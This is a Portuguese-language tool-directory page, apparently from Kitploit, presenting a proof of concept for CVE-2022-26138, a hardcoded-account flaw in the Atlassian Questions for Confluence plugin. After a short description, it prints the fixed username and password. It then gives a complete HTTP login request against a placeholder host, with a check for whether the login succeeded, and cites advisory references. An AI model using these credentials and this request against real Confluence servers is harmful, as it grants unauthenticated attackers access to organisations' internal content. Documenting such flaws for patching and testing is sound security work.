Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-26138 — Senha Codificada do Atlassian Questions (CVE-2022-26138) | Kitploit
Ferramentas/GitHubGitHub/alcaparra/cve-2022-26138
Ataques de SenhaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubalcaparra/cve-2022-26138

CVE-2022-26138

Senha Codificada do Atlassian Questions (CVE-2022-26138)

Ver Repositório
31103há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-26138 POC

questions_cve

Descrição

root@kitploit:~
O aplicativo Atlassian Questions For Confluence para Confluence Server e Data Center 
cria uma conta de usuário do Confluence no grupo confluence-users com 
o nome de usuário disabledsystemuser e uma senha fixa (hardcoded). Um invasor remoto, 
não autenticado, de posse da senha fixa, poderia
explorar isso para fazer login no Confluence e acessar todo o conteúdo acessível 
aos usuários do grupo confluence-users. 
Essa conta de usuário é criada ao instalar as versões 2.7.34, 2.7.35 e 3.0.2 do aplicativo.

POC

Credenciais hardcoded:

  • Usuário: disabledsystemuser
  • Senha: disabled1system1user6708

Exploração

root@kitploit:~
POST /dologin.action HTTP/1.1
Host: victim.local
Content-Type: application/x-www-form-urlencoded

os_username=disabledsystemuser&os_password=disabled1system1user6708&login=Log+in&os_destination=%2Fvulnerable.action

Se o servidor redirecionar para /vulnerable.action, as credenciais são válidas.

De onde você tirou as credenciais?

As credenciais hardcoded estavam simplesmente presentes dentro dos arquivos jar do plugin afetado

https://packages.atlassian.com/maven-atlassian-external/com/atlassian/confluence/plugins/confluence-questions/3.0.2/confluence-questions-3.0.2.jar

Referências

  • https://www.cvedetails.com/cve/CVE-2022-26138/
  • https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html
  • https://jira.atlassian.com/browse/CONFSERVER-79483
Baixar ferramenta